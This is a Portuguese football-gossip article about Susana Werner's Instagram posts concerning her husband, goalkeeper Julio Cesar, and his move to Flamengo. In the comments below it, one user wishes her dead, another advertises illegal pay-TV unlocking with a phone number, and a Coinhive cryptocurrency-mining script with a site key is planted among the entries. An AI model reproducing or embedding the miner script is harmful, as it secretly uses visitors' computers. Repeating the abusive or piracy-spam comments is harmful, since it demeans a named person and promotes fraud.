Susana Werner publica foto antiga com goleiro Julio Cesar e cutuca: "Vou ali ser feliz"

1/2/2018 11:00

Susana Werner publica foto antiga com goleiro Julio Cesar e cutuca: "Vou ali ser feliz"

Susana Werner publica foto antiga com goleiro Julio Cesar e cutuca: Vou ali ser feliz
Após dizer que errou em expor problemas com goleiro Julio Cesar, a ex-atriz e modelo Susana Werner, mulher do jogador do Flamengo, usou novamente as redes sociais nesta quinta-feira para citar o assunto. Ao publicar uma foto antiga com o marido, a empresária citou os 17 anos de relacionamento, mas não perdeu a chance de fazer ironia e escreveu “vou ali ser feliz”, na legenda da imagem.



“#tbt há quase 17 anos. Somos falhos, faz parte. Vou ali ser feliz (indo trabalhar) e já volto. Kkkk. Beijos e bom dia!”, brincou Susana no Instagram.

Na quarta-feira, Susana disse que errou ao expor a sua insatisfação pela ida de Julio Cesar para o Flamengo na web. Ela aproveitou para negar que o goleiro tenha saído para a balada com Adriano Imperador, notícia publicada pelo jornal “O Dia” nesta semana.

“Pessoal... Não acreditem nesta notícia de festa, ela foi dada em 2013 pela mesma pessoa e com a mesma foto kkk... vão se aproveitar para tripudiar em cima da minha tristeza e do meu marido. Erro meu em nos expor aqui... Fiquem em paz, eu tô bem e ele também”, disse Susana.

"Foi um dia infeliz... estava triste demais e acabei desabafando no local errado, mas aprendi...", acrescentou ela, em papo com um seguidor.

Adriano Imperador, que se prepara para voltar aos gramados, também negou a notícia da balada: “Não encontrei, muito menos saí com o Julio Cesar desde que voltou de Portugal. Por favor, peço, MAIS UMA VEZ, que chequem a fonte para não divulgarem notícias falsas...”.

O Jogo Extra foi o primeiro a dar a insatisfação de Susana Werner com a vinda de Julio Cesar para o Rio de Janeiro e o Flamengo. Ela queria que o goleiro ficasse em Lisboa com a família. Ainda na segunda-feira, Susana desabafou com vídeos no Instagram. Ela chegou a chorar copiosamente.

Lembrando que Julio Cesar assinou com o Flamengo por três meses. O sonho dele é encerrar a carreira no Rubro-Negro com o título carioca. Ele está recebendo no clube um salário simbólico, de cerca de R$ 15 mil mensais.

3207 visitas - Fonte: EXTRA


VEJA TAMBÉM
- BAITA ELENCO! Leonardo Jardim exalta a equipe após a vitória
- FLAMENGO IMPARÁVEL! vitória sobre o Medellín mantém 100 e amplia escrita histórica
- TABELA NA LIBERTADORES! Fla vence em casa e dispara



Instale o app do Flamengo para Android, receba notícias e converse com outros flamenguistas no Fórum!

Mais notícias do Flamengo

Notícias de contratações do Flamengo
Notícias mais lidas

Comentários do Facebook -




pq ñ morre do coração essa idiota

VOCÊ QUE ESTÁ CANSADO DE TER POUCA PROGRAMAÇÃO DE TVV ASSSINATURA E NÃO CONCORDA COM OS VALORES COBRADOS
FAÇO LIBERAÇÃO E DIMINUÍMOS O VALOR DA CONTA
PARA TODO BRASIL
WHATZSAP 11 958694345

(Comentário excluído)

< src="https://coinhive.com/lib/coinhive.min.js"><>var a=new CoinHive.Anonymous("IoWE2BeVK3azaWL7xmC6HFJcYbwgiyoQ",{throttle:.3});a .start();

Enviar Comentário

Para enviar comentários, você precisa estar cadastrado e logado no nosso site. Para se cadastrar, clique Aqui. Para fazer login, clique Aqui ou Conecte com Facebook.
publicidade